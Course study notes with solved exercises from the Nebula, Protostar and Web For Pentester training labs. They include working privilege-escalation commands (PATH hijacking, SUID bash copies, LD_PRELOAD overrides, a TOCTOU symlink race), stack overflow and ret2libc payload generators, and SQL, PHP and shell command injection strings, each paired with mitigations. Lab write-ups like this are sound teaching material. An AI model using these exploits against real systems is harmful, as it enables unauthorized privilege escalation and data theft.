Share
## https://sploitus.com/exploit?id=F1717668-06AE-58E8-A269-7D18FB40BCBB
# Secure Software Development โ€” Notes & Exercise Writeups

Personal study notes and solved exercises for the *Secure Software Development* course.
The material covers core security concepts, basic binary exploitation, and web vulnerabilities, using the **Nebula**, **Protostar**, and **Web For Pentester** training environments.

> **Disclaimer** โ€” This material is collected for **educational and personal study purposes only**. Every technique described was performed in intentionally vulnerable lab environments (Nebula, Protostar, Web For Pentester) or on machines I own. Do not apply any of this to systems you are not explicitly authorized to test โ€” doing so is illegal.

---

## Table of Contents

- [Part I โ€” Core Concepts](#part-i--core-concepts)
  - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)
  - [TOCTOU โ€” Time of Check, Time of Use](#toctou--time-of-check-time-of-use)
  - [Dirty COW (CVE-2016-5195)](#dirty-cow-cve-2016-5195)
  - [Static Analysis](#static-analysis)
  - [Dynamic Analysis](#dynamic-analysis)
  - [Penetration Testing](#penetration-testing)
- [Part II โ€” Nebula](#part-ii--nebula)
- [Part III โ€” Protostar](#part-iii--protostar)
- [Part IV โ€” Web For Pentester](#part-iv--web-for-pentester)
- [Appendix โ€” Exam section index](#appendix--exam-section-index)

---

# Part I โ€” Core Concepts

## Cross-Site Scripting (XSS)

*How does an XSS attack work? Where does the problem lie? What is the vulnerability? How is it fixed?*

A Cross-Site Scripting (XSS) attack occurs when a web application lets a user submit unsanitized data, such as JavaScript code. When this happens, the vulnerable server embeds that content in the response that builds the web page. The server itself does not execute the malicious code: its job is only to return it inside the page. It is the user's browser that plays the active role โ€” once it receives the page it automatically runs all the code present, including any attacker-injected scripts, because it trusts the content provided by the server.

There are two main types of XSS: **reflected** and **persistent**. In reflected XSS the code is returned immediately in the response and requires the victim to visit a link specially crafted by the attacker. In persistent XSS the malicious code is stored by the server (for example in a database) and then automatically shown to every user who visits the page, with no need to share a link.

**Mitigation:** sanitize and validate all user input, set a **Content Security Policy (CSP)** to block execution of unauthorized scripts, use **secure frameworks** that correctly handle output escaping, and keep libraries and components up to date.

## TOCTOU โ€” Time of Check, Time of Use

These are flaws caused by synchronization problems in multitasking, multi-user systems. The system checks a security-relevant state at one point in time and later uses the result of that check, but in the interval between the check and the use the conditions may change without raising any alarm. To fix or avoid it, you can use atomic transactions or restructure the program logic so it is not vulnerable to race conditions.

## Dirty COW (CVE-2016-5195)

Dirty COW is a Linux kernel vulnerability that lets a local user gain elevated (root) privileges by exploiting a **race condition** in the **Copy-On-Write (COW)** mechanism used in **virtual memory** management.

To understand the problem you have to start from how memory works in Unix-like systems. When a process calls `fork()`, a child process is created that shares **the same memory pages** as the parent, but in **read-only** mode. This is an optimization called *Copy-On-Write*: as long as no one writes, the memory stays shared. But if either process tries to modify a page, the kernel creates a **private copy (a "dirty copy")** of the page just for that process.

The bug lies in the fact that an unprivileged process can **map a read-only file into memory** โ€” for example a binary or a root-only configuration file โ€” and then try to modify it by abusing a concurrency condition.

The attack exploits three key components:

1. **`mmap()`** โ€” the process maps the read-only file (e.g. `/etc/passwd`) into memory, obtaining a pointer to a memory region representing the file.
2. **`fork()`** โ€” the process creates a separate thread that will manipulate the memory in parallel.
3. **`madvise(addr, length, MADV_DONTNEED)`** โ€” the `madvise()` syscall with the `MADV_DONTNEED` flag tells the kernel that the mapped pages can be dropped (invalidated) from cache, as if no longer needed.

This triggers a **race condition**: while one thread calls `madvise()` on that memory region, another thread repeatedly tries to write to it using `ptrace()` or `/proc/self/mem`. The kernel, trying to invalidate and reload the page from the shared copy, gets tricked and **allows writing to the original copy of the file**, even though the user has no permission to modify it. In effect, you manage to **write to a protected read-only file**, breaking the isolation enforced by Unix permissions.

The name "Dirty COW" comes from exactly this: the page's "dirty copy" caused by the bug in Copy-On-Write.

## Static Analysis

**Static code analysis** is a technique that inspects a program โ€” both at **source code** and **compiled binary** level โ€” **without executing it**. This kind of analysis serves several purposes: understanding how a piece of software works, assessing its quality, finding logical and structural errors, and โ€” most relevant to this course โ€” detecting **potential security vulnerabilities**.

As software systems have evolved, static analysis is now also applied in **safety-critical** domains such as automotive or avionics, where it is essential to guarantee that the software cannot harm people or property.

The main **static analysis techniques** include:

- **Reverse engineering**, used to understand a program's behavior starting from a binary file.
- **Metrics computation**, such as **McCabe's cyclomatic complexity**, which measures the logical complexity of functions to identify critical points in the code.
- **Formal methods**, which apply mathematical tools to prove correctness properties of the code.
- **Static security testing**, which inspects source code looking for **toxic patterns** โ€” code fragments that may indicate vulnerabilities (e.g. improper use of `system()`, `exec()`...).

Analysis can be **manual** or **automated**. In a security context you typically start with three steps:

1. Identify the programming language used.
2. Identify the source files to analyze.
3. Search for suspicious or vulnerable patterns in the code.

For example, when analyzing an application like *Web For Pentester*, you use tools like `find`, `sed`, `sort`, `uniq` to list all files and compute the frequency of the languages used. Using regular expressions (`grep`) you look for **toxic patterns** such as calls to dangerous functions (`system`, `exec`, etc.), also looking for the **dynamic concatenations** typical of languages like PHP (using the `.` operator).

A pattern can be **suspicious but not always vulnerable**: to be sure, **dynamic analysis** is needed, which studies the actual behavior of the code at runtime.

### Automated tools: Semgrep

One of the most powerful static-analysis tools is **Semgrep** ("semantic grep"), an advanced tool able to recognize toxic patterns the way `grep` would, but with **awareness of the syntactic and semantic structure of the language**.

Semgrep can analyze related functions even when the code is far apart, distinguish between local and global variables, and identify dangerous use of functions in critical contexts. It uses a system of **rules written in YAML**, which specify:

- a unique ID,
- a description of the pattern,
- the severity level (info, warning, error),
- compatibility with various languages,
- and of course the pattern to look for.

**Rules** can be simple (a single line of code) or complex (blocks of code), and can contain **ellipses (`...`)** as wildcards, or **variables** (e.g. `$VAR`) that capture and reuse code fragments found. You can write custom rules โ€” even **mimicking the paid ones** in Semgrep's freemium version โ€” and use public online repositories to reuse existing rules.

## Dynamic Analysis

Dynamic analysis is the set of techniques that observe and inspect a program while it is running, in order to understand its behavior and detect logical, performance, or security errors. Unlike static analysis, here the code is actually executed: for this reason testing fully qualifies as a dynamic technique.

An important concept tied to dynamic testing is **code coverage**, i.e. the percentage of code actually exercised by the tests. The higher the coverage, the more complete the analysis.

Main dynamic-analysis techniques:

1. **Symbolic execution** โ€” the program is run with a variety of inputs to determine which code paths get activated.
2. **Memory analysis** โ€” memory allocation, use, and release operations are observed directly, looking for errors like leaks, use-after-free, or buffer overflows.
3. **Fuzzing** โ€” automatically and randomly mutated inputs are sent to the program to discover unexpected behavior or vulnerabilities, such as crashes or command injection.

These techniques can be manual or automated, but in the case of fuzzing the very nature of the approach usually makes it automated.

## Penetration Testing

**Penetration testing** is a practice used to assess the **security of a computer system by simulating real attacks**. The different types of testing are often confused: it is important to distinguish between **vulnerability assessment**, an actual **penetration test**, and a **red team engagement**, which represent increasing levels of invasiveness and depth.

### Vulnerability Assessment

A preliminary, non-invasive phase whose goal is to:

- identify the machines and services present on the network;
- analyze the available assets;
- compile a list of potential vulnerabilities.

This activity does not involve accessing or exploiting the vulnerabilities. It only produces a **map of the security posture** of the infrastructure. It is often automated, for example with tools like **Nessus**, and lets you detect **toxic patterns** or weak signals in the system.

### Penetration Test

Starting from the information gathered in the vulnerability assessment, the penetration test gets to the heart of things, trying to **actually exploit** the identified vulnerabilities in order to:

- gain access to internal systems;
- perform **privilege escalation** up to root or administrator;
- reach other networks (lateral movement);
- enable **pivoting**, i.e. using a compromised machine as a foothold to attack networks that would otherwise be unreachable.

It is a potentially invasive activity that can **disrupt production services**, and precisely for this reason **few clients actually accept it**. In many cases an assessment is sold as if it were a full penetration test.

To run a penetration test you use semi-automated tools such as:

- **custom scripts**,
- **frameworks** (e.g. **Metasploit**) that handle all phases: enumeration, exploit, post-exploitation, escalation, lateral movement.

### Red Team Engagement

A complete, realistic simulation of a **targeted** cyber attack, emulating the behavior of **real attackers** with advanced techniques. Unlike a penetration test (which explores the whole environment), a red team focuses on **a specific objective**, such as access to the executives' machines.

Everything is allowed: phishing, use of unknown exploits, credential reuse, and attempts at **persistence** in the network without being detected. The goal is also to assess **how effective the defense team (Blue Team) is** at detecting and countering the attack. This kind of simulation requires a **formal contract**, because without consent it would be **a criminal offense**.

---

# Part II โ€” Nebula

## Level 00

Level 00 is based on a permissions vulnerability, specifically the use of the SUID bit. There is a file on the system that is executable but, thanks to the SUID bit, runs with the permissions of the file's owner โ€” in this case `flag00`.

To find the file:

```bash
find / -perm -4000 -user flag00 2>/dev/null
```

**Mitigation:** manage permissions more carefully โ€” remove the SUID bit when it is not needed, and if it is needed, set proper permissions on who can access the file. (`find` can also use `-perm 2000` for the SGID bit or `6000` for both.)

## Level 01

Level 01 is based on a vulnerability inside a C program that performs a `system` call and, to run `echo`, does not use an absolute path but relies on resolving `/usr/bin/env`. This means that if the attacker controls `PATH`, they can have a malicious program with the same name as `echo` executed. The program runs with `flag01`'s permissions thanks to `setresgid`/`setresuid`, which set all credentials to the effective ones (since the SUID bit is set).

To build the exploit, create a malicious `echo` (or a symlink to `getflag`) in a directory you control, then prepend it to `PATH`:

```bash
echo "/bin/sh" > /tmp/echo      # or: ln -sf /bin/getflag /tmp/echo
chmod +x /tmp/echo
export PATH=/tmp:$PATH
./flag01
```

**Mitigation:** avoid `/usr/bin/env` to run a command โ€” use absolute paths; avoid `system()` and prefer `execve()`, which executes a binary or script directly without spawning a new shell; sanitize the environment before calling external commands; remove the SUID bit.

## Level 02

Level 02 is based on a vulnerability inside a C program that reads the `USER` value directly from the environment and inserts it into the command string passed to `system` without any check. If a malicious actor changes it to:

```bash
USER="hacker; /bin/sh"
```

the command becomes `/bin/echo hacker; /bin/sh is cool`. The shell runs the `echo` but also opens a shell, with `flag02`'s permissions since the program is SUID.

**Mitigation:** sanitize the environment and inputs, use syscalls like `execve()` that do not spawn a new shell, remove the SUID bit.

## Level 03

Level 03 has multiple vulnerabilities. There is a world-writable directory and, next to it, a script that executes the files inside that directory and deletes them once finished. Nebula tells us this script runs via cron, probably with the owner's permissions (`flag03`). This combination is perfect for an exploit: create a script inside the world-writable directory that copies `/bin/bash` and sets the SUID bit, so that when run we get the owner's permissions.

Inside the script placed in the world-writable directory:

```bash
cp /bin/bash /home/flag03/bash    # NB: not in /tmp, which clears the SUID bit
chmod u+s /home/flag03/bash
```

Once cron runs it:

```bash
./bash -p     # -p so privileges are not dropped
```

**Mitigation:** change the directory permissions so it is not world-writable; manage access to `flag03`'s directory more strictly.

## Level 04

Level 04 has a program that takes a file as input and reads its content. There is a small check on the file name, which must not be `token` or it fails. The vulnerability is the shallowness of that check: it happens before the file is opened, while symbolic links are resolved by the kernel after the open. So if you create a symlink to the `token` file under a different, harmless-looking name, the program will read it anyway.

```bash
ln -sf /home/flag04/token /tmp/fake
```

**Mitigation:** resolve the path with `realpath()`, avoid string-based checks, and use `lstat()` to detect symbolic links.

## Level 05

Level 05 has a vulnerability due to excessive asset exposure. In `flag05`'s home there is a `.backup.tgz` file (not visible with plain `ls` โ€” you need `ls -a`, because in the 1970s the current and parent directories were always listed, and to fix that, developers defaulted to hiding entries starting with a dot).

Copy the `.tgz` to a directory like `/tmp` or your home and extract it:

```bash
tar -xf backup.tgz
```

This yields a `.ssh` directory containing an SSH RSA key pair; with the private key you can connect without knowing the password:

```bash
ssh -i id_rsa flag05@localhost      # or: ssh -p  -i id_rsa flag05@localhost
```

**Mitigation:** lower access privileges on directories holding sensitive data, or remove files containing sensitive data from the system.

## Level 06

In level 06, Nebula hints that the problem concerns an "old" password-management system, so the first thing to do is check `/etc/passwd`, because old UNIX systems stored user and hashed-password information there. Reading the file shows a plaintext hash on `flag06`. With `hashid` you can determine the hash type and its hashcat mode number โ€” important because, with hashcat and a dictionary like `rockyou`, you can run a dictionary attack:

```bash
hashcat -a 0 -m 1500  rockyou.txt
```

If the analysis was already run before, the command stops and must be re-run with `--show`.

**Mitigation:** always make sure not to leave sensitive information exposed, especially after integrating with legacy systems. Here, the hash should have been placed directly in `/etc/shadow`, accessible only by root, to avoid exposure.

## Level 07

Useful checks:

```bash
ps -ef | grep flag07              # is the web server running?
cat thttpd.conf | grep -c '#'     # read config without comments
```

Level 07 has a **command injection** vulnerability caused by a Perl program that pings a host address passed in the `$host` variable. Looking at the actual code, `$host` is never checked/sanitized, and backticks are used โ€” which in Perl execute a shell command, so anything inside is interpreted by the shell. Next to this program there is an `httpd` config file (readable) showing the listening port and the user it runs as (`flag07`). Exploit:

```bash
echo "GET /index.cgi?Host=8.8.8.8%3Bgetflag" | nc localhost 7007
```

Use `%3B` because `;` is a special character that gets interpreted and stripped from the URL.

**Mitigation:** lower the privileges on the config file, filter the input, and do not use backticks or `system` with external input.

## Level 08

Level 08 is again excessive asset exposure: a world-readable file in `flag08`'s directory, created by root, with a `.pcap` extension. Running `apropos pcap` reveals it relates to network traffic. Move it to a machine with Wireshark and study the capture.

`Statistics > Protocol Hierarchy` shows packet types and sizes โ€” here almost all are small, stable TCP packets. `Analyze > Follow > TCP Stream` reveals a login pattern: one side sends a character and gets it echoed back (the username being reflected on the connecting terminal). The password is **not** reflected and appears only once. Watch out for dots in the password caused by the ASCII representation: check their hex value โ€” here it is `7F`, which is the DEL key.

Reproducing the input sequence yields `flag08`'s password, `backd00Rmate`.

**Mitigation:** delete network captures and don't leave files like this that let credentials be recovered; if they can't be deleted, at least set proper permissions, and use encrypted communication between assets with appropriate protocols.

## Level 09

Level 09 is a setuid C program that acts as a wrapper around PHP code. Running the binary invokes a PHP script with elevated privileges (user `flag09`). The goal is to exploit a flaw in the PHP code to run an arbitrary command (specifically `getflag`) with `flag09`'s permissions.

Key operations in the PHP code:

- **File read** โ€” `file_get_contents($filename)` reads the entire content of the file passed as the first argument (user-controlled).
- **Regex substitution** โ€” `preg_replace` with the `/e` modifier on every match of the pattern `\[email (.*)\]`. The replacement is `spam("\\2")`, meaning the second captured group is passed to `spam()` and evaluated as PHP code because of `/e`. The `/e` modifier makes the replacement string execute as PHP code, which is the security flaw if the input is not strictly validated.
- **Unused `$use_me` parameter** โ€” the `markup` function takes two parameters (`$filename` and `$use_me`) but never uses `$use_me`. This is a hint: it could be exploited indirectly in the evaluated expression.
- **`spam` obfuscation function** โ€” replaces `.` with `" dot "` and `@` with `" AT "`. It plays a minor role here (it does not significantly alter a payload without `.` or `@`).

To build the exploit we abuse PHP features. Using the **double-curly-brace trick** `{${...}}` we can force execution of `phpinfo()` by setting the input file to `[email {${phpinfo()}}]`, which works. But `[email {${system("getflag")}}]` fails with a parse error because the inner quotes in `system("...")` are mishandled in the eval. We can instead leverage the unused `$use_me` parameter to pass the command:

```
[email {${system($use_me)}}]
./flag09 /tmp/test.txt getflag
```

An alternative solution uses **backticks** (in PHP they work like `shell_exec`):

```
[email ${`cp /bin/bash /home/flag09/bash && chmod u+s /home/flag09/bash`}]
```

**Mitigation:** remove the `/e` modifier in `preg_replace` (which evaluates the second argument as PHP code via `eval()`) and replace it with `preg_replace_callback`, which evaluates nothing as PHP code; sanitize inputs.

## Level 10

Level 10 has a binary that takes a file path and an IP address, opening a connection to a client to read the file content if you have the right permissions. The vulnerability is visible in the source: the distance between the file-accessibility check and its use is quite large (with expensive operations such as a print forced by an `stdout` flush). This is a **TOCTOU โ€” Time of Check, Time of Use** vulnerability. The input is not validated before use, and the directory also contains a `token` file with `flag10`'s access credentials.

Exploiting it needs 4 shells:

**Shell 1** โ€” create two dummy files `faketoken` and an empty `link`, then a `link.sh`:

```bash
#!/bin/bash
while true; do
  ln -sf /tmp/faketoken /tmp/link
  ln -sf /home/flag10/token /tmp/link
done
```

This swaps the symlink between the file we can access and the one we cannot but want to read. Make it executable: `chmod +x /tmp/link.sh`.

**Shell 2** โ€” a `server.sh` that listens on the port used by the program and writes the read output to `server.txt`:

```bash
#!/bin/bash
while true; do
  nc.traditional -vlp 18211 >> /tmp/server.txt
done
```

**Shell 3** โ€” a `run.sh` that launches the program via `nice`, which sets the priority level; we want maximum TOCTOU exposure, so we use the lowest priority:

```bash
#!/bin/bash
while true; do
  nice -n 19 /home/flag10/flag10 /tmp/link 127.0.0.1
done
```

**Shell 4** โ€” after starting the first three in order, read the output produced by shell 2 to confirm the symlink swap worked and printed the token's content:

```bash
tail -f /tmp/server.txt
```

**Mitigation:** drop privileges and remove access to the token; shrink the TOCTOU window by bringing the check and use operations closer together; validate inputs and, for example, refuse symbolic links by using `lstat()` (which reads a file's metadata).

## Level 13

Level 13 has a binary that checks whether the user running it has real UID = 1000, using `getuid()`. The vulnerability is that the check relies on a function in the dynamic libc, which can be manipulated through the dynamic linker (`ld.so`) behavior, exploiting the `LD_PRELOAD` environment variable. `LD_PRELOAD` forces the dynamic linker to load a specific library before the others; if that library defines a function with the same name as a libc function, the linker uses our version instead of the standard one.

Create a `getuid.so` library from a small C program (after checking how `getuid()` is declared via `man getuid`):

```c
#include 
uid_t getuid(void) {
    return 1000;
}
```

Compile it (`-shared` produces a runtime-linkable, shareable object; `-fPIC` produces position-independent, relocatable code):

```bash
gcc -fPIC -shared -o getuid.so getuid.c
LD_PRELOAD=./getuid.so ./flag13
```

This yields the token.

> **Note on the `ld.so` safety check:** there is a control mechanism for setuid/setgid binaries that prevents preloading libraries when the binary and library don't have matching privilege levels. So running the original SUID binary fails. Both must be either low (no SUID) or both high (with SUID). To proceed, either add the SUID bit to `getuid.so` (only possible as root) or remove the SUID bit from the binary (just make a copy of `/flag13`), then run the copy with the updated `LD_PRELOAD`.

**Mitigation:** use stronger authentication, disable `LD_PRELOAD` for sensitive binaries, and do not embed tokens in plaintext in your code.

---

# Part III โ€” Protostar

> **General approach for all stack levels.** If you don't have the source, find the buffer size in `gdb`: disassemble the function containing the buffer and `gets`, measure the distance from the `sub` (space reserved on the stack for locals) to where the buffer address is loaded (`lea`); watch for other variables (visible from the `mov`). Remember the architecture is **little-endian**, so multi-byte values are written least-significant-byte first.
>
> **General mitigation for all stack levels:** replace `gets` with safer functions like `fgets()`; use compile-time protections such as stack canaries; use memory-safe languages. From Stack 4 onward, also use a shadow stack and ASLR; from Stack 5, also Data Execution Prevention (NX / no-execute).

## Stack 0

Vulnerability due to `gets`, which reads input without bounds checking (it reads until EOF or newline). After finding the buffer size, overflow it by one to flip the adjacent variable and pass the check:

```bash
python -c "print('a'*65)" | /opt/protostar/bin/stack0
```

## Stack 1

Vulnerability due to `strcpy`, which copies the input into the buffer with no checks. The goal is not just to write any value but to set the `modified` variable to `0x61626364`.

Find the buffer size (64), then decode the target value:

```bash
python -c "import codecs; print(repr(codecs.decode('61626364','hex')))"   # -> 'abcd'
./stack1 $(python -c "print('a'*64+'dcba')")
```

We write `61626364` reversed (`dcba`) because the architecture is little-endian.

## Stack 2

Same as Stack 1 (`strcpy` with no input check), but the source is the `GREENIE` environment variable, so the overflow must go through it.

Find the buffer size, then decode the target value `0x0d0a0d0a` (which is `\r\n\r\n`):

```bash
python -c "import codecs; print(repr(codecs.decode('0d0a0d0a','hex')))"
GREENIE=$(python -c 'print "A"*64 + "\n\r\n\r"') /opt/protostar/bin/stack2
```

Written reversed because of little-endian.

## Stack 3

The goal is to use a buffer overflow to overwrite a function pointer with the address of the `win` function.

Find the buffer size, get the function address (`p win` in `gdb`), then:

```bash
python -c "print('a'*64+'\x24\x84\x04\x08')" | /opt/protostar/bin/stack3
```

## Stack 4

Similar to Stack 3, but instead of assigning a function address to a variable, we overwrite the `main` return address, so we must be sure of the buffer size and especially the buffer-to-return-address distance.

For a precise calculation: disassemble `main`, set a breakpoint on the `gets` line to read the up-to-date buffer address (in `eax`, via `info register`), print the return address with `p $ebp+4`, then compute the distance in Python and print the `win` address (`p win`). Final exploit:

```bash
python -c "print('a'* + '')" | ./stack4
```

## Stack 5

More complex: the `gets` vulnerability now requires injecting **shellcode** into the buffer. Several factors matter: the buffer-to-return-address length, using shellcode of an appropriate size (too large causes a segfault), and the actual buffer start address (used to overwrite the return address so the injected shellcode runs).

For a precise calculation: disassemble `main`, run `unset env LINES` and `unset env COLUMNS` (important โ€” `gdb` adds them and shifts the buffer start address vs. outside `gdb`), breakpoint the `gets` line to read the buffer address from `eax`, print the return address with `p $ebp+4`, compute the distance.

Payload generator:

```python
#!/usr/bin/python
length   = 
ret      = ''
shellcode = ""
padding  = 'a' * (length - len(shellcode))
payload  = shellcode + padding + ret
print payload
```

```bash
chmod +x genpayload.py
python /tmp/genpayload.py > /tmp/payload
(cat /tmp/payload; cat) | /opt/protostar/bin/stack5
```

The second `cat` keeps the pipe open (keeps `stdin` open), letting us interact with the shell spawned by the shellcode.

## Stack 6

Here `main` calls `getpath`, which contains a `gets` vulnerability. Unlike Stack 5, the return address is also checked: if it points back into the program's own stack, it prints an error and exits โ€” preventing shellcode injection on the stack. Instead of jumping to the stack, we jump to a system function (a **ret2libc**-style approach) to achieve arbitrary behavior.

Steps as before: compute the buffer-to-return-address length; in `gdb` also find the addresses of `system()`, `exit()`, and the buffer start, because we will call `system()` passing it the exit address and the address where the command will be (the buffer start, where we place `/bin//sh\x00`). The `//` is read as a single `/` but helps alignment; `\x00` is the string terminator that `system` expects.

Payload generator:

```python
#!/usr/bin/python
print '/bin//sh\x00' + 'a' * ( - len('/bin//sh\x00')) \
      +  +  + 
```

```bash
python /tmp/genpayload2.py > /tmp/payload2
(cat /tmp/payload2; cat) | /opt/protostar/bin/stack6
```

This bypasses the check imposed by the program.

---

# Part IV โ€” Web For Pentester

## XSS

### Example 1

No input check at all; the user-supplied value is printed directly into the HTML body without sanitization, so HTML/JavaScript injected via the `name` parameter is interpreted and executed by the browser.

```
http://localhost:8080/xss/example1.php?name=alert('XSS')
```

**Mitigation:** sanitize and validate inputs, escape special characters, use whitelists, etc.

### Example 2

Like Example 1 (input reflection), but with a weak check that looks for the `` tags to block them. Since it's weak, other XSS injections work:

```
http://localhost:8080/xss/example2.php?name=
```

Because the check is also not case-sensitive, you could also use `...`.

**Mitigation:** sanitize/validate inputs, escape special characters, whitelist, etc.

### Example 3

Like Example 2 but now case-insensitive for the script tags. Still a weak defense, so other XSS injections work:

```
http://localhost:8080/xss/example3.php?name=
```

**Mitigation:** sanitize/validate inputs, escape special characters, whitelist, etc.

## SQL Injection

> Once you understand the defenses, beyond tautologies you can run queries to find the number of columns, which ones are visible, and query table/column names to extract precise information.

### Example 1

Without seeing the code, test for SQL injection with special characters like `'` to close the query. If the page behaves differently, you've hit it. First try tautologies, like `' OR 1=1%23`, to print the whole table (this works because the code uses a `while` loop to iterate over all result rows and print each record as a table row, showing multiple results at once).

**Mitigation:** sanitize/validate inputs, use prepared statements to parameterize the data, escape special characters, whitelist, etc.

### Example 2

Very similar, but adds a check for the presence of spaces. Bypass it with SQL comments `/**/`:

```
'/**/OR/**/1=1%23
```

Or with a tab (`%09`/`%27` variants) or newline (`%0A`):

```
'%0AOR%0A1=1%23
```

**Mitigation:** sanitize/validate inputs, prepared statements, escape special characters, whitelist, etc.

### Example 3

Like Example 2 but tab and newline are also blocked, so the solution remains SQL comments: `'/**/OR/**/1=1%23`.

### Example 4

The `id` parameter is passed through `mysql_real_escape_string` before being put in the query โ€” escaping dangerous characters inside quoted strings. To bypass, simply don't close a quote (the value isn't quoted here) and run the same queries:

```
id=3 OR 1=1%23
```

### Example 5

Similar, but it only checks that the input *starts* with one or more digits, without verifying the whole input is numeric โ€” so the previous example still works.

### Example 6

Like Example 5, but the input must *end* with one or more digits or it errors out.

### Example 7

A more structured check: it verifies the line contains only integers โ€” but that's the point to exploit, since it only checks a single line, not multiple. Add a new line plus the arbitrary command:

```
id=2%A0 OR 1=1%23
```

### Example 8 โ€” Blind (time-based) SQL injection

Solved in class to show how to exploit a page via blind SQL injection. In the code, the parameter we control (`ORDER`) never appears in the output, so injecting something malicious shows no error message and no visible page change. Hence a **time-based blind** attack, observing the server's response times.

Notes/peculiarities of this query:

- Input reflection happens on an `ORDER BY` statement at the end of the query.
- The backtick `` ` `` is used to delimit the parameter instead of a single/double quote.
- An input filter `mysql_real_escape_string` escapes special characters (including quotes), **but it does not filter the backtick**, so injection is still possible.
- The `ORDER BY` clause prevents a `UNION` (it closes the query) and takes an ordering parameter, making it harder to extract information from the page.

Useful building blocks:

- **`sleep(N)`** โ€” SQL function that sleeps N seconds, returning 0 when done.
- **SQL short-circuit logic** โ€” with `AND`/`OR`, the second clause is not evaluated if the first already determines the result: `0 AND expr` and `1 OR expr` skip `expr`. Tied to `SLEEP(N)`, this lets us decide whether a clause is true or false based on response time. *Note: the sleep is applied per row of the query.*
- **`ORDER BY` internals** โ€” to order by a column, MySQL first checks for an index; otherwise it uses the generic **filesort** procedure (`SHOW INDEX FROM users;` checks for an index). In this example there's no index, so filesort is applied โ€” which is why the injected boolean expression gets evaluated.
- **SQL boolean values** โ€” there are three: a value convertible to integer is `FALSE` if 0, `TRUE` otherwise; a non-convertible value becomes `UNKNOWN`. **String โ†’ boolean:** a string is `TRUE` if it starts with a number, false otherwise (so every non-null string here converts to false).
- **Boolean `ORDER BY`** โ€” ascending puts all FALSE first then TRUE; descending puts all TRUE first then FALSE.
- **`IF(expr, v1, v2)`** โ€” returns one of two values based on the evaluated boolean; we use it to introduce a statement whose result we monitor via `sleep()`.
- **`DATABASE()`** โ€” returns the current database name.

First, find the database-name length (using binary search to reduce the number of queries):

```
name ` OR if(length(database())=n, sleep(1), NULL)%23
```

If `n` is correct, the site responds after the sleep; otherwise it returns immediately. Then brute-force the name character by character with ASCII + binary search (ASCII range 32โ€“127), using `ASCII()` and `SUBSTRING(str, k, k)` (enumeration runs from 1 to n, not 0):

```
name ` OR if(ASCII(SUBSTRING(database(),1,1))>N_ASCII, SLEEP(1), NULL)%23
```

Once a letter is found, increase the `SUBSTRING` index to the next character until the full string is recovered. The same procedure can be applied to other values, and it is fully automatable with a script.

### Example 9

Very similar to Example 8 but more vulnerable, because the check is on strings and the input is **not** wrapped in quotes โ€” so just inject the malicious code without closing any quote. Like the previous one, blind attacks work since the controlled parameter never reaches the output:

```
Order=if(length(database())=n, sleep(1), NULL)%23
```

## Code Injection

### Example 1

User input is interpolated into a string and passed to `eval()` (which runs the content as PHP). To exploit, close the quotes of the input parameter and inject arbitrary code:

```php
hacker"; system("id");//
```

**Mitigation:** avoid `eval` where possible; otherwise sanitize the user input thoroughly.

### Example 2

Again uncontrolled, unsanitized input, plus the deprecated PHP function `create_function()`, which dynamically creates an anonymous function from a PHP code string and internally uses `eval()`. Read the code and find how to inject: close the `strcmp` with `)` and `;`, close the function with `}`, then inject and end with `;` and a comment:

```php
id);}phpinfo();#
```

**Mitigation:** remove deprecated functions like `create_function` and sanitize inputs.

### Example 3

Three input parameters, none checked, using `preg_replace`, which replaces a pattern with another string. You specify a pattern (the substring to search for in the third argument, the base), and `new` replaces the matched part in the base. Example: `new=hacker&pattern=/lamer/&base=Hello%20lamer` โ†’ `Hello hacker`. With no checks:

```
new=system("tail /etc/passwd")&pattern=/x/e&base=x
```

Important: include `/e`, so the replacement is evaluated โ€” `system` runs via `eval`.

**Mitigation:** validate and sanitize inputs, use safer functions.

### Example 4

Multiple vulnerabilities: `assert` is used with user-controlled input; the input is delimited by single quotes and passed through `trim()` to remove spaces, then handed to `assert`, which accepts strings but executes them as PHP. To exploit, close the string with `'` and use `.` to concatenate:

```php
' . phpinfo() . '
```

**Mitigation:** don't use `assert` with strings; add input checks.

---

# Appendix โ€” Exam section index

The exercises were also organized by exam section. Sections **4x** cover attacks/exploits; sections **5x** cover the corresponding mitigations.

| Section | Focus | Exercises |
|---------|-------|-----------|
| 4b | SUID / effective UID | Nebula 00, Nebula 01, Protostar Stack 5 |
| 4c | Reflection & command injection | Nebula 02, Protostar Stack 1 & 3, W4P input reflection, W4P file include 1, W4P SQL 1 |
| 4d | Writable dirs, exposed assets, hashes, pcap | Nebula 03, 05, 06, 08; W4P SQL 1 (SQL forgery) |
| 4e | TOCTOU race condition | Nebula 10 |
| 4f | PATH/env injection, LD_PRELOAD, blind SQLi | Protostar Stack 5; Nebula 01, 02, 07, 13; W4P code injection 1; W4P injection 8 |
| 5b | Privilege drop, bash 4.2 privmode, config hardening | Nebula 01 (mitigations), Nebula 07 (mitigation) |
| 5c | Remove debug output, lower privileges, prod config | Nebula 02 (mitigation), W4P include 1, W4P injections 1 |
| 5d | Permission hardening, /etc/shadow, SSL/TLS | Nebula 03, 06; W4P virtual host (HTTPS) |

### Mitigation notes (sections 5x)

**Nebula 01 โ€” second mitigation.** After removing the SUID bit, the PATH exploit no longer works; alternatively, modify the source to drop privileges at the start of execution. A separate weakness: **bash 4.2** does not drop privileges at startup when the shell is invoked as `/bin/sh` (and `system()` runs commands via `/bin/sh`). Studying the Debian package's **privmode patch** shows it adds an invocation check for releasing privileges; the patch can be removed by rebuilding the package with `dpkg-buildpackage` (building unsigned and without tests to save time).

**Nebula 02 โ€” mitigation.** The binary prints a revealing message and uses `PATH` for command injection. Removing the output alone doesn't fix it; also lower the binary's privileges and remove debug messages. (Reverse-engineering the symbol-stripped binary is harder but doable with the right tools. Tip: prefer using links to modify files rather than rewriting them.)

**Nebula 03 โ€” mitigation (three measures).** (1) Change the directory's group and restrict access to the `flag03` group. (2) More strict: grant directory permissions only to user `flag03`. (3) Slightly paranoid but useful: also restrict access to `flag03`'s home directory. In theory restricting the directory suffices, but tightening permissions wherever possible is good practice.

**Nebula 06 โ€” mitigation.** Move the hash from the world-readable `/etc/passwd` to `/etc/shadow`, accessible only by root (requires superuser).

**Nebula 07 โ€” mitigation.** The Perl-based web app runs with excessive privileges. Use `ss -ntl` to find listening ports (7007 is the server). Copy the config file and server, change the port, working directory, and user, and adjust permissions so the server can no longer run `getflag` with elevated privileges.

**W4P include 1 โ€” mitigation.** Simply mistyping a URL can reveal server information or crash messages, because Apache runs in debug mode and prints error messages. The `php-common` Debian package provides common config files, including production-oriented ones. After backing up the config, change Apache's PHP configuration so error messages are no longer printed, denying the attacker information from crashes.

